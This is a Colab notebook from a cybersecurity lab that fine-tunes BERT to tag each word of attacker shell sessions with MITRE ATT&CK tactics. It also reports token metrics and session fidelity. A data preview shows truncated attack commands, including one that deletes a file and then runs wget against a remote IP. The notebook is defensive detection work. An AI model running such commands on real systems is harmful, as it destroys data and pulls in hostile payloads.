<a href="https://colab.research.google.com/github/AI4-Cybersec/Laboratory4/blob/main/lab/notebooks/Task3.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# Task 3

## Setup

In [1]:
# --- Check Python and pip versions ---
!python --version
!pip install --upgrade pip

Python 3.12.12
Collecting pip
  Downloading pip-25.3-py3-none-any.whl.metadata (4.7 kB)
Downloading pip-25.3-py3-none-any.whl (1.8 MB)
[2K   [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m1.8/1.8 MB[0m [31m69.3 MB/s[0m eta [36m0:00:00[0m
[?25hInstalling collected packages: pip
  Attempting uninstall: pip
    Found existing installation: pip 24.1.2
    Uninstalling pip-24.1.2:
      Successfully uninstalled pip-24.1.2
Successfully installed pip-25.3


In [2]:
# --- Install required libraries ---
!pip install torch
!pip install numpy pandas scikit-learn matplotlib seaborn
!pip install tqdm



In [3]:
# --- Import libraries ---
import os
import time
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import json

from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler, LabelEncoder
from sklearn.utils.class_weight import compute_class_weight
from sklearn.metrics import classification_report, confusion_matrix, accuracy_score, f1_score
from sklearn.decomposition import PCA
from sklearn.impute import SimpleImputer

import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import Dataset, DataLoader, TensorDataset

from tqdm import tqdm

### Colab Pro

In [4]:
# --- Check GPU availability ---
gpu_info = !nvidia-smi
gpu_info = '\n'.join(gpu_info)
if gpu_info.find('failed') >= 0:
  print('Not connected to a GPU')
else:
  print(gpu_info)

Thu Dec 18 09:56:04 2025       
+-----------------------------------------------------------------------------------------+
| NVIDIA-SMI 550.54.15              Driver Version: 550.54.15      CUDA Version: 12.4     |
|-----------------------------------------+------------------------+----------------------+
| GPU  Name                 Persistence-M | Bus-Id          Disp.A | Volatile Uncorr. ECC |
| Fan  Temp   Perf          Pwr:Usage/Cap |           Memory-Usage | GPU-Util  Compute M. |
|                                         |                        |               MIG M. |
|   0  Tesla T4                       Off |   00000000:00:04.0 Off |                    0 |
| N/A   44C    P8             12W /   70W |       0MiB /  15360MiB |      0%      Default |
|                                         |                        |                  N/A |
+-----------------------------------------+------------------------+----------------------+
                                                

In [5]:
# --- Check RAM availability ---
from psutil import virtual_memory

# Total (not currently free) memory of the runtime, in decimal gigabytes.
ram_gb = virtual_memory().total / 1e9
print(f'Your runtime has {ram_gb:.1f} gigabytes of available RAM\n')

# 20 GB is the cut-off this notebook uses to call a runtime "high-RAM".
print('You are using a high-RAM runtime!' if ram_gb >= 20 else 'Not using a high-RAM runtime')

Your runtime has 13.6 gigabytes of available RAM

Not using a high-RAM runtime


### Paths setup


In [6]:
# --- Mount Google Drive (for Google Colab users) ---
# Only works inside Google Colab: the `google.colab` package is not available elsewhere.
# The paths defined in the next cell live under this mount point.
from google.colab import drive
drive.mount('/content/drive')

Mounted at /content/drive


In [7]:
# --- Define Paths ---
laboratory = 'Laboratory4'

# Every path keeps its trailing slash, as the rest of the notebook expects.
base_path = '/content/drive/MyDrive/'
project_path = f'{base_path}Projects/{laboratory}/'
data_path = f'{project_path}data/'
results_path = f'{project_path}results/'

# Create the folder tree on first use; existing folders are left untouched.
for directory in (project_path, data_path, results_path):
    os.makedirs(directory, exist_ok=True)

for caption, directory in (
    ("Project path", project_path),
    ("Data path", data_path),
    ("Results path", results_path),
):
    print(f"{caption}: {directory}")

Project path: /content/drive/MyDrive/Projects/Laboratory4/
Data path: /content/drive/MyDrive/Projects/Laboratory4/data/
Results path: /content/drive/MyDrive/Projects/Laboratory4/results/


In [8]:
import os

from transformers import AutoTokenizer
import numpy as np
import pandas as pd

import matplotlib.pyplot as plt
import seaborn as sns

from sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score
from itertools import chain
from copy import deepcopy

from transformers import AutoModelForTokenClassification, AutoConfig, get_scheduler
from transformers import DataCollatorForTokenClassification

from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from datasets import Dataset, DatasetDict
from torch import cuda

from tqdm.auto import tqdm
import torch

from torch.utils.data import DataLoader
from torch.optim import AdamW

In [9]:
# Run on the GPU when CUDA is available, otherwise fall back to the CPU.
# `device` is read as a global by the training and evaluation helpers below.
device = 'cuda' if cuda.is_available() else 'cpu'
device

'cuda'

## Start

In [None]:
# ============================================================================
# GLOBAL CONFIGURATION: Plot Saving (Colab/Google Drive only)
# ============================================================================
SAVE_PLOTS = 1  # any falsy value (e.g. 0) shows figures without writing them to disk
# ============================================================================

import os
import matplotlib.pyplot as plt

# Every figure of this task is written below `<results_path>/Task3`.
BASE_DIR = os.path.join(results_path, 'Task3')
os.makedirs(BASE_DIR, exist_ok=True)

def save_figure_for_report(filename, dpi=300, bbox_inches='tight'):
    """
    Save the current matplotlib figure for use in the report.

    Nothing is written when the global `SAVE_PLOTS` flag is falsy or when
    `filename` is empty/None.

    Args:
        filename: Name of the file (e.g., 'class_distribution.png'), relative to BASE_DIR
        dpi: Resolution (default 300 for high quality)
        bbox_inches: Bounding box setting (default 'tight' to remove whitespace)
    """
    # An empty filename would make `filepath` point at the directory itself,
    # so it is treated like the "saving disabled" case.
    if not SAVE_PLOTS or not filename:
        return

    filepath = os.path.join(BASE_DIR, filename)
    plt.savefig(filepath, dpi=dpi, bbox_inches=bbox_inches)
    print(f"Figure saved to: {filepath}")


### Helper Functions

In [11]:
def compute_metrics(full_predictions, full_labels):
    """
    Compute token-level classification metrics over a set of sequences.

    The per-sequence lists are concatenated, so every token weighs the same
    regardless of which sequence it came from. Precision, recall and F1 are
    macro-averaged; classes without predictions score 0 instead of warning.

    Args:
        full_predictions: List of lists of predicted labels
        full_labels: List of lists of true labels (same nesting as predictions)
    Returns:
        dict: keys "token_accuracy", "token_precision", "token_recall", "token_f1"
    """
    y_pred = list(chain.from_iterable(full_predictions))
    y_true = list(chain.from_iterable(full_labels))

    # Shared keyword arguments of the three macro-averaged scores
    macro = dict(average='macro', zero_division=0)

    return {
        "token_accuracy": accuracy_score(y_true, y_pred),
        "token_precision": precision_score(y_true, y_pred, **macro),
        "token_recall": recall_score(y_true, y_pred, **macro),
        "token_f1": f1_score(y_true, y_pred, **macro),
    }

In [None]:
def plot_stats(title, training_losses, validation_losses=None, best_epoch=None):
    """
    Draw the per-epoch loss curves of one training run, save and show the figure.

    Args:
        title: Figure title; also used (lower-cased, spaces -> '_', parentheses
            removed) to build the output filename 'learning_curve_<title>.png'.
        training_losses: Sequence with one training loss per epoch.
        validation_losses: Optional sequence with one validation loss per epoch.
        best_epoch: Optional 0-based index of the best epoch. It is only marked
            when `validation_losses` is given.
    """
    sns.set_theme(style="whitegrid")
    fig, ax = plt.subplots(figsize=(10, 5))

    # Epochs are shown 1-based on the x-axis
    epochs = range(1, len(training_losses) + 1)
    ax.plot(epochs, training_losses, label='Training Loss', linewidth=2, color='#1f77b4')

    has_validation = validation_losses is not None
    if has_validation:
        ax.plot(epochs, validation_losses, label='Validation Loss',
                linewidth=2, linestyle='--', color='#d62728')

    if has_validation and best_epoch is not None:
        # `best_epoch` is 0-based, the axis is 1-based
        marker_x = best_epoch + 1
        marker_y = validation_losses[best_epoch]
        # The label is lifted by 10% of the training-loss range above the marker
        lift = (max(training_losses) - min(training_losses)) * 0.1

        ax.axvline(x=marker_x, color='gray', linestyle=':', linewidth=2, label='Best Epoch')
        ax.scatter(marker_x, marker_y, color='black', s=50, zorder=5)
        ax.annotate('Best Model',
                    xy=(marker_x, marker_y),
                    xytext=(marker_x, marker_y + lift),
                    arrowprops=dict(facecolor='black', shrink=0.05, width=1, headwidth=8),
                    fontsize=14, fontweight='bold')

    ax.set_title(title, fontsize=18, fontweight='bold', pad=15)
    ax.set_xlabel('Epoch', fontsize=17)
    ax.set_ylabel('Cross-Entropy Loss', fontsize=17)
    ax.tick_params(axis='both', which='major', labelsize=15)

    ax.legend(fontsize=16, frameon=True, shadow=True)
    ax.grid(True, linestyle='-', alpha=0.5)

    # One tick per epoch, but only while the axis stays readable
    if len(epochs) < 20:
        ax.set_xticks(epochs)

    fig.tight_layout()

    # --- SAVE THE PLOT ---
    filename_chars = str.maketrans({" ": "_", "(": None, ")": None})
    clean_title = title.lower().translate(filename_chars)
    save_figure_for_report(f"learning_curve_{clean_title}.png")

    plt.show()

In [13]:
def training_loop(model, optimizer, lr_scheduler):
    """
    Fine-tune `model` for `N_TRAIN_EPOCHS` epochs and keep the best checkpoint.

    After each epoch the model is scored on `eval_dataloader`; the checkpoint with
    the lowest validation loss (the latest one on ties) is deep-copied and returned.

    Reads the notebook globals `N_TRAIN_EPOCHS`, `train_dataloader`,
    `eval_dataloader` and `device`, and calls `postprocess` / `compute_metrics`.

    Args:
        model: Token-classification model whose forward pass returns `.loss`
            (when labels are given) and `.logits`.
        optimizer: Optimizer bound to `model`'s parameters.
        lr_scheduler: Scheduler stepped once per training batch.

    Returns:
        tuple: (best_model, best_epoch, best_val_loss, train_losses, val_losses)
            where `best_epoch` is 0-based and both loss lists hold one float per epoch.
    """
    best_val_loss, best_epoch = np.inf, 0
    # Returned as-is if no epoch ever improves on `np.inf` (e.g. zero epochs)
    best_model = deepcopy(model).to(device)

    train_losses, val_losses = [], []  # per-epoch mean losses

    # The total is computed here rather than read from a global set by the caller,
    # and the context manager closes the bar even when training raises.
    total_steps = N_TRAIN_EPOCHS * len(train_dataloader)
    with tqdm(total=total_steps) as progress_bar:
        for epoch in range(N_TRAIN_EPOCHS):
            # ---- Training ----
            model.train()
            train_loss = 0.0
            for batch in train_dataloader:
                batch = {key: value.to(device) for key, value in batch.items()}
                # Model expects:
                # - input_ids > i.e., which tokens we must map into the embeddings
                # - attention_mask > which tokens each token may attend to
                # - labels > the NER tags
                outputs = model(input_ids=batch["input_ids"],
                                attention_mask=batch["attention_mask"],
                                labels=batch["labels"])
                # The model computes its own loss because `labels` were passed
                loss = outputs.loss
                train_loss += loss.item()
                loss.backward()
                optimizer.step()
                lr_scheduler.step()
                optimizer.zero_grad()
                progress_bar.update(1)
            train_losses.append(train_loss / len(train_dataloader))

            # ---- Validation ----
            model.eval()
            full_predictions, full_labels = [], []
            val_loss = 0.0
            for batch in eval_dataloader:
                batch = {key: value.to(device) for key, value in batch.items()}
                with torch.no_grad():
                    outputs = model(**batch)
                val_loss += outputs.loss.item()
                # Most likely class per token; ignored (-100) positions are dropped
                predictions = outputs.logits.argmax(dim=-1)
                true_predictions, true_labels = postprocess(predictions, batch["labels"])
                full_predictions += true_predictions
                full_labels += true_labels
            val_loss = val_loss / len(eval_dataloader)
            val_losses.append(val_loss)

            metrics = compute_metrics(full_predictions, full_labels)
            print(
                f"epoch {epoch}:",
                {
                    key: metrics[key]
                    for key in ["token_accuracy", "token_f1"]
                },
            )

            # `<=` keeps the most recent checkpoint when two epochs tie
            if val_loss <= best_val_loss:
                best_epoch = epoch
                best_val_loss = val_loss
                best_model = deepcopy(model).to(device)

    return best_model, best_epoch, best_val_loss, train_losses, val_losses

In [14]:
# Evaluation
def evaluate_model(model, best_model, dataloader=None):
    """
    Run `best_model` over a dataloader and compute token-level metrics.

    Args:
        model: The model that was being trained. It is only switched to eval
            mode (kept for backward compatibility); no inference is run with it.
        best_model: The checkpoint actually used for inference.
        dataloader: Batches to evaluate on. Defaults to the global `test_dataloader`.

    Returns:
        tuple: (full_predictions, full_labels, test_metrics) where the first two
            are lists of per-sequence label lists as produced by `postprocess`
            and the last is the dict returned by `compute_metrics`.
    """
    loader = test_dataloader if dataloader is None else dataloader

    model.eval()
    # Inference runs on `best_model`, so it is the one that must be in eval mode
    # (dropout disabled) for the reported metrics to be deterministic.
    best_model.eval()

    full_predictions, full_labels = [], []
    for batch in loader:
        batch = {key: value.to(device) for key, value in batch.items()}
        with torch.no_grad():
            outputs = best_model(**batch)
        # Most likely class per token; ignored (-100) positions are dropped
        predictions = outputs.logits.argmax(dim=-1)
        true_predictions, true_labels = postprocess(predictions, batch["labels"])
        full_predictions += true_predictions
        full_labels += true_labels
    test_metrics = compute_metrics(full_predictions, full_labels)

    return full_predictions, full_labels, test_metrics

In [None]:
def print_classification_report(true_labels, true_predictions, model_name):
    """
    Print a performance summary and plot the per-class F1-score as a bar chart.

    Reports token accuracy, macro precision/recall/F1 (via `compute_metrics`) and
    the average session fidelity, i.e. the mean over sessions of the fraction of
    tokens predicted correctly. The bar chart is saved through
    `save_figure_for_report` as 'per_class_f1_<model_name>.png'.

    Args:
        true_labels: List of per-session lists of true label names.
        true_predictions: List of per-session lists of predicted label names,
            aligned with `true_labels`.
        model_name: Name shown in the report header, plot title and filename.
    """
    # 1. Token-level metrics (same computation as during training/evaluation)
    token_metrics = compute_metrics(true_predictions, true_labels)
    flat_preds = list(chain.from_iterable(true_predictions))
    flat_labels = list(chain.from_iterable(true_labels))

    # 2. Session fidelity (Requirement 4)
    # Sessions without any labelled token are skipped: they have no defined
    # fidelity and would otherwise raise ZeroDivisionError.
    fidelity_scores = [
        sum(1 for l, p in zip(labels, preds) if l == p) / len(labels)
        for labels, preds in zip(true_labels, true_predictions)
        if len(labels) > 0
    ]
    avg_fidelity = float(np.mean(fidelity_scores)) if fidelity_scores else float("nan")

    # Print Text Summary
    print("\n" + "="*50)
    print(f" PERFORMANCE REPORT: {model_name}")
    print("="*50)
    print(f"{'Token Accuracy:':<25} {token_metrics['token_accuracy']:.4f}")
    print(f"{'Macro Precision:':<25} {token_metrics['token_precision']:.4f}")
    print(f"{'Macro Recall:':<25} {token_metrics['token_recall']:.4f}")
    print(f"{'Macro F1-score:':<25} {token_metrics['token_f1']:.4f}")
    print(f"{'Avg Session Fidelity:':<25} {avg_fidelity:.4f}")
    print("-" * 50)

    # 3. Prepare Data for Plotting (Requirement 3)
    # Passing `labels=` keeps every known class in the report, even when it
    # does not occur in this particular evaluation set.
    class_names = [id2label[i] for i in sorted(id2label.keys())]
    report_dict = classification_report(
        flat_labels, flat_preds,
        labels=class_names,
        target_names=class_names,
        output_dict=True,
        zero_division=0
    )

    # Tick labels carry the support (number of true tokens) of each class
    labels_with_support = [f"{cls}\n(n={int(report_dict[cls]['support'])})" for cls in class_names]
    f1_values = [report_dict[cls]['f1-score'] for cls in class_names]

    # Create Plot
    plt.figure(figsize=(12, 6), dpi=100)
    sns.set_theme(style="whitegrid")

    # Each bar takes the palette entry matching the rank of its F1 value
    colors = sns.color_palette("Blues_d", len(f1_values))
    rank = np.argsort(f1_values)
    palette = [colors[i] for i in np.argsort(rank)]

    barplot = sns.barplot(x=labels_with_support, y=f1_values, palette=palette, edgecolor=".2")

    # Write the F1 value above every bar
    for bar in barplot.patches:
        barplot.annotate(format(bar.get_height(), '.3f'),
                         (bar.get_x() + bar.get_width() / 2., bar.get_height()),
                         ha='center', va='center',
                         xytext=(0, 9),
                         textcoords='offset points',
                         fontsize=10, fontweight='bold')

    plt.title(f"Per-Class F1-Score: {model_name}", fontsize=16, fontweight='bold', pad=20)
    plt.ylabel("F1-Score", fontsize=12)
    plt.xlabel("Tactics (and Support Count)", fontsize=12)
    plt.ylim(0, 1.1)  # Leave space for the value labels
    plt.xticks(rotation=0)

    sns.despine(left=True)
    plt.tight_layout()

    # --- SAVE THE PLOT ---
    clean_name = model_name.lower().replace(" ", "_").replace("(", "").replace(")", "")
    save_figure_for_report(f"per_class_f1_{clean_name}.png")

    plt.show()

In [None]:
def postprocess(predictions, labels):
    """
    Turn batched class ids into per-sequence lists of label names.

    Both tensors are detached, moved to CPU and converted to NumPy. Positions
    whose *label* is -100 are dropped from both outputs, so predictions and
    labels stay aligned. Ids are translated with the global `id2label` mapping.

    Args:
        predictions (torch.Tensor): Predicted class ids per token (i.e. already
            arg-maxed; raw logits cannot be looked up in `id2label`).
        labels (torch.Tensor): Ground-truth class ids, with -100 on positions
            to ignore. Presumably the same shape as `predictions` — TODO confirm.

    Returns:
        Tuple[List[List[str]], List[List[str]]]:
            - `true_predictions`: predicted label names for the kept positions.
            - `true_labels`: true label names for the kept positions.
    """
    pred_rows = predictions.detach().cpu().clone().numpy()
    gold_rows = labels.detach().cpu().clone().numpy()

    # Ground truth: keep every position that is not marked as ignored
    true_labels = []
    for gold_row in gold_rows:
        true_labels.append([id2label[gold] for gold in gold_row if gold != -100])

    # Predictions: keep exactly the positions kept in the ground truth
    true_predictions = []
    for pred_row, gold_row in zip(pred_rows, gold_rows):
        kept = [id2label[pred] for pred, gold in zip(pred_row, gold_row) if gold != -100]
        true_predictions.append(kept)

    return true_predictions, true_labels

### Start

In [16]:
# `data_path` already ends with a slash, so the file names are joined with
# os.path.join instead of inserting a second separator by hand.
train_df = pd.read_json(os.path.join(data_path, "train.json"))
test_df = pd.read_json(os.path.join(data_path, "test.json"))
print(f"The dataset contains {train_df.shape[0]:,} elements")
train_df.head(2)

The dataset contains 251 elements


Unnamed: 0,session,label
0,rm -rf /var/run/1sh ; wget -c http://71.127.14...,"[Execution, Execution, Execution, Execution, E..."
1,cat /proc/cpuinfo | grep name | wc -l ; echo r...,"[Discovery, Discovery, Discovery, Discovery, D..."


Fine-tune a BERT model for Named Entity Recognition. Load the pre-trained model with
pre-trained weights from Huggingface. Focus on a token-classification task: The model
will try to classify each token into one of the MITRE Tactics. Compute the following
metrics:
1. Token classification accuracy.
2. Macro token classification precision, recall, and f1-score.
3. Per-class f1-score: reports the results in a barplot.
4. Average session ‘fidelity’: for each session, the model predicts some tokens correctly.

For each session, the ‘fidelity’ score is the ratio between the number of correct
predictions and the total number of tokens. For example, for the session ‘cat
cpu/procinfo;’ with the tags [‘Discovery’, ‘Discovery’, ‘Discovery’] and the
prediction [‘Discovery’, ‘Discovery’, ‘Execution’], the fidelity is $\frac{2}{3} \approx 0.67$.
Calculate the average fidelity for all test sessions.

Q: Can the model achieve "good" results with only 251 training labeled samples? Where
does it have the most difficulties?

In [17]:
# Hold out 20% of the labelled sessions for validation (fixed seed for a repeatable split).
# NOTE: `train_df` is rebound here, so re-running only this cell splits the
# already reduced frame again; re-run the loading cell first.
train_df, val_df = train_test_split(train_df, test_size=0.2, random_state=42)
print(f"New training dataset contains {len(train_df):,} elements")
print(f"Validation dataset contains {len(val_df):,} elements")

New training dataset contains 200 elements
Validation dataset contains 51 elements


In [18]:
# Convert the training DATAFRAME into an huggingface DATASET
train_ds = Dataset.from_pandas(train_df.reset_index(drop=True))
train_ds

Dataset({
    features: ['session', 'label'],
    num_rows: 200
})

In [19]:
# One Hugging Face Dataset per split, keyed by the split name used downstream.
split_frames = {"train": train_df, "valid": val_df, "test": test_df}
full_ds = DatasetDict({
    split_name: Dataset.from_pandas(frame.reset_index(drop=True))
    for split_name, frame in split_frames.items()
})
full_ds

DatasetDict({
    train: Dataset({
        features: ['session', 'label'],
        num_rows: 200
    })
    valid: Dataset({
        features: ['session', 'label'],
        num_rows: 51
    })
    test: Dataset({
        features: ['session', 'label'],
        num_rows: 108
    })
})

In [20]:
# 1. Extract the labels
unique_labels = list(train_df.label.explode().unique())
print(unique_labels)

['Execution', 'Discovery', 'Not Malicious Yet', 'Persistence', 'Other', 'Defense Evasion', 'Impact']


In [21]:
# 2. Obtain a dictionary that maps the labels into identifiers (Labels Encoder)
id2label = {it:label for it, label in enumerate(unique_labels)}
label2id = {label:it for it, label in enumerate(unique_labels)}
print(label2id)

{'Execution': 0, 'Discovery': 1, 'Not Malicious Yet': 2, 'Persistence': 3, 'Other': 4, 'Defense Evasion': 5, 'Impact': 6}


In [22]:
def convert_labels_to_ids(sample):
    """Add a 'label_id' entry holding the integer id of every label in sample['label'].

    The sample is modified in place and returned; ids come from the global `label2id`.
    """
    label_ids = []
    for tactic in sample["label"]:
        label_ids.append(label2id[tactic])
    sample['label_id'] = label_ids
    return sample

# `map` on the DatasetDict applies the function to every split
encoded_dataset = full_ds.map(convert_labels_to_ids)
encoded_dataset

Map:   0%|          | 0/200 [00:00<?, ? examples/s]

Map:   0%|          | 0/51 [00:00<?, ? examples/s]

Map:   0%|          | 0/108 [00:00<?, ? examples/s]

DatasetDict({
    train: Dataset({
        features: ['session', 'label', 'label_id'],
        num_rows: 200
    })
    valid: Dataset({
        features: ['session', 'label', 'label_id'],
        num_rows: 51
    })
    test: Dataset({
        features: ['session', 'label', 'label_id'],
        num_rows: 108
    })
})

In [23]:
# Show one training sample before and after label encoding
EXAMPLE_ID = 3
example = encoded_dataset["train"][EXAMPLE_ID]
print("Example:")
print(f'Original label: {example["label"]}')
print(f'Converted label: {example["label_id"]}')

Example:
Original label: ['Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Persistence', 'Persistence', 'Persistence', 'Persistence', 'Persistence', 'Persistence', 'Persistence', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery', 'Discovery'

In [24]:
# Checkpoint whose tokenizer is loaded from the Hugging Face Hub.
# NOTE(review): the name `model` holds a checkpoint string here and is rebound to
# the actual network in the fine-tuning cell; `pretrained_model` stores the same string.
model = "google-bert/bert-base-uncased"
tokenizer = AutoTokenizer.from_pretrained(model)

The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.


tokenizer_config.json:   0%|          | 0.00/48.0 [00:00<?, ?B/s]

config.json:   0%|          | 0.00/570 [00:00<?, ?B/s]

vocab.txt: 0.00B [00:00, ?B/s]

tokenizer.json: 0.00B [00:00, ?B/s]

Create a function that aligns the labels with the tokens

In [25]:
def align_labels_with_tokens(labels, word_ids):
    """Expand word-level labels to one label per token.

    Every token inherits the label of the word it belongs to, whether it is the
    first sub-token of that word or a continuation. Tokens that belong to no
    word (word id None, e.g. special tokens) get -100.

    Args:
       labels (list): Word-level labels, indexed by word position.
       word_ids (list): For each token, the index of the word it came from,
                        or None for special tokens.
    Returns:
       list: One label per entry of `word_ids`.
    Example:
       labels = [0, 1, 2]  # Labels for 3 words
       word_ids = [None, 0, 0, 1, 2, 2, None]  # Tokenized into 7 tokens
       result = [-100, 0, 0, 1, 2, 2, -100]  # Aligned labels
    """
    return [
        -100 if word_id is None else labels[word_id]
        for word_id in word_ids
    ]

Now create a function that, for each sample:
1) Tokenize the input
2) Align the tokens with the corresponding tags

In [26]:
def tokenize_and_align_labels(samples):
    """Tokenize a batch of sessions and attach token-level labels.

    Each session string is split on single spaces into words, the words are
    tokenized with the global `tokenizer`, and the word-level label ids are
    expanded to token level with `align_labels_with_tokens`.

    Args:
       samples (dict): Batch with
           - 'session': list of session strings
           - 'label_id': list of lists with one label id per word
    Returns:
       The tokenizer output (input_ids, attention_mask, ...) with an extra
       'labels' entry holding the token-aligned label ids of every session.
    Notes:
       - `truncation=True` is passed, so over-long sessions are cut by the tokenizer
       - `is_split_into_words=True` because the input is already a list of words
    """
    words_per_session = [session.split(" ") for session in samples["session"]]

    tokenized_inputs = tokenizer(
        words_per_session,
        truncation=True,
        is_split_into_words=True,
    )

    # word_ids(row) tells, for every token of that row, which word it came from
    tokenized_inputs["labels"] = [
        align_labels_with_tokens(word_label_ids, tokenized_inputs.word_ids(row))
        for row, word_label_ids in enumerate(samples["label_id"])
    ]
    return tokenized_inputs

Eventually, use the `map` function provided by the huggingface Dataset

Notice: it already works on ALL the partitions (`train`, `valid` and `test`)

In [27]:
# Columns present before tokenization ('session', 'label', 'label_id'); they are
# dropped so that only the tokenizer outputs and 'labels' remain.
original_columns = encoded_dataset["train"].column_names
tokenized_datasets = encoded_dataset.map(
    tokenize_and_align_labels,
    batched=True, # The function receives a batch of samples at a time, which speeds things up
    remove_columns=original_columns, # Drop the original (non-tensor) columns
)
tokenized_datasets

Map:   0%|          | 0/200 [00:00<?, ? examples/s]

Map:   0%|          | 0/51 [00:00<?, ? examples/s]

Map:   0%|          | 0/108 [00:00<?, ? examples/s]

DatasetDict({
    train: Dataset({
        features: ['input_ids', 'token_type_ids', 'attention_mask', 'labels'],
        num_rows: 200
    })
    valid: Dataset({
        features: ['input_ids', 'token_type_ids', 'attention_mask', 'labels'],
        num_rows: 51
    })
    test: Dataset({
        features: ['input_ids', 'token_type_ids', 'attention_mask', 'labels'],
        num_rows: 108
    })
})

In [28]:
# Collate function used by all dataloaders below to assemble batches.
# Presumably pads inputs and labels to a common length within each batch — TODO confirm.
data_collator = DataCollatorForTokenClassification(tokenizer=tokenizer)

In [29]:
# Options shared by the three loaders
loader_options = dict(collate_fn=data_collator, batch_size=16)

# Only the training loader shuffles; validation and test keep the dataset order.
train_dataloader = DataLoader(tokenized_datasets["train"], shuffle=True, **loader_options)
eval_dataloader = DataLoader(tokenized_datasets["valid"], **loader_options)
test_dataloader = DataLoader(tokenized_datasets["test"], **loader_options)

## Fine-Tuning a pre-trained BERT model

In [30]:
# Hub checkpoint that is fine-tuned in the grid search below
pretrained_model = "google-bert/bert-base-uncased"

In [None]:
# =============================
# Grid Search: Learning Rate Comparison for BERT Fine-Tuned
# =============================

sns.set_theme(style="whitegrid")
N_TRAIN_EPOCHS = 40
SEED = 42  # same seed for every learning rate, so the runs differ only in the LR

# Define learning rates to try
bert_lrs = [5e-6, 1e-5, 5e-5]
bert_lr_labels = [f"LR={lr}" for lr in bert_lrs]

# Store losses and results for each LR
bert_train_losses = {}
bert_val_losses = {}
bert_results = {}


def _token_accuracy(eval_model, dataloader):
    """Token accuracy of `eval_model` over `dataloader` (positions labelled -100 are ignored)."""
    eval_model.eval()
    split_predictions, split_labels = [], []
    for batch in dataloader:
        batch = {key: value.to(device) for key, value in batch.items()}
        with torch.no_grad():
            logits = eval_model(**batch).logits
        batch_predictions, batch_labels = postprocess(logits.argmax(dim=-1), batch["labels"])
        split_predictions += batch_predictions
        split_labels += batch_labels
    return compute_metrics(split_predictions, split_labels)["token_accuracy"]


for lr, lr_label in zip(bert_lrs, bert_lr_labels):

    # Re-seed so the classification-head initialisation and the batch shuffling
    # are the same for every learning rate and across notebook re-runs.
    torch.manual_seed(SEED)
    np.random.seed(SEED)

    # Re-initialize model and optimizer for each LR
    model = AutoModelForTokenClassification.from_pretrained(
        pretrained_model_name_or_path=pretrained_model,
        id2label=id2label,
        label2id=label2id,
    ).to(device)

    optimizer = AdamW(model.parameters(), lr=lr)

    # Linear decay to zero over the whole run; the scheduler is stepped once per batch
    num_training_steps = N_TRAIN_EPOCHS * len(train_dataloader)

    lr_scheduler = get_scheduler(
        "linear",
        optimizer=optimizer,
        num_warmup_steps=0,
        num_training_steps=num_training_steps,
    )

    # Train
    best_model, best_epoch, best_val_loss, train_losses, val_losses = training_loop(model, optimizer, lr_scheduler)
    bert_train_losses[lr_label] = train_losses
    bert_val_losses[lr_label] = val_losses

    # Evaluate on the test set BEFORE reporting: the report must describe the
    # predictions of this learning rate, not those left over from a previous run.
    full_predictions, full_labels, test_metrics = evaluate_model(model, best_model)

    print_classification_report(full_labels, full_predictions, model_name=f"BERT Fine-tuned {lr_label}")
    plot_stats(f"BERT Fine-tuned {lr_label}", train_losses, val_losses, best_epoch)

    # Token accuracy of the best checkpoint on each split
    train_acc = _token_accuracy(best_model, train_dataloader)
    val_acc = _token_accuracy(best_model, eval_dataloader)
    test_acc = test_metrics["token_accuracy"]

    # Tuples keep the (None, None, accuracy) layout read by the summary table
    bert_results[lr_label] = {
        'train': (None, None, train_acc),
        'val': (None, None, val_acc),
        'test': (None, None, test_acc)
    }

In [None]:
# Plotting all LRs on the same figure
colors = ["#1b9e77", "#d95f02", "#7570b3"]
fig, axes = plt.subplots(1, 2, figsize=(17, 6.5), dpi=160)
TITLE_FONTSIZE = 22
LABEL_FONTSIZE = 18
TICK_FONTSIZE = 16
LEGEND_FONTSIZE = 16
LINE_WIDTH = 3.2

ax1, ax2 = axes  # left: training loss, right: validation loss

for ax, panel_title, loss_history in (
    (ax1, "BERT Fine-Tuned — Training Loss", bert_train_losses),
    (ax2, "BERT Fine-Tuned — Validation Loss", bert_val_losses),
):
    for i, (lr_label, losses) in enumerate(loss_history.items()):
        # 1-based epochs, consistent with the per-run learning curves;
        # colours wrap around if more learning rates than colours are compared.
        epochs = range(1, len(losses) + 1)
        ax.plot(epochs, losses, label=lr_label, linewidth=LINE_WIDTH, color=colors[i % len(colors)])
    ax.set_title(panel_title, fontsize=TITLE_FONTSIZE, fontweight='bold')
    ax.set_xlabel("Epoch", fontsize=LABEL_FONTSIZE)
    ax.set_ylabel("Loss", fontsize=LABEL_FONTSIZE)
    ax.tick_params(labelsize=TICK_FONTSIZE)
    ax.grid(alpha=0.3)
    ax.legend(frameon=True, framealpha=0.95, fontsize=LEGEND_FONTSIZE, edgecolor="gray")

plt.tight_layout()
save_figure_for_report("task3_bert_lr_comparison_report.png")
plt.show()


def _format_accuracy(value):
    """Render an accuracy for the summary table; '-' when it was not computed."""
    return "-" if value is None else f"{value:.4f}"


# Summary Table
print("\n" + "="*90)
